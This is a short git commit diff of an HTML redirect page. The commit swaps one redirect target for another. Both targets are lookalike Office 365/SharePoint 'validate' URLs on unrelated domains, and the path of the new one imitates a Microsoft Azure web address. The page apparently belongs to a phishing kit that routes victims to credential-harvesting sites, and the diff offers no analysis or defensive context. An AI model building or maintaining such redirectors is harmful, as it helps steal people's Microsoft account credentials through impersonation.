Initial commit with index.html

--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <title>Redirecting...</title>
     <script>
         // Replace 'https://example.com' with your desired redirect URL
-        const redirectTo = "https://ansr.ru.com/SharePoint/Validate-Office365-TG/index.php";
+        const redirectTo = "https://frenopa.za.com/micro365secure.z13.web.core.windows.net/index.php";
 
         // Function to generate a random 35-character uppercase string
         function generateRandomString(length) {
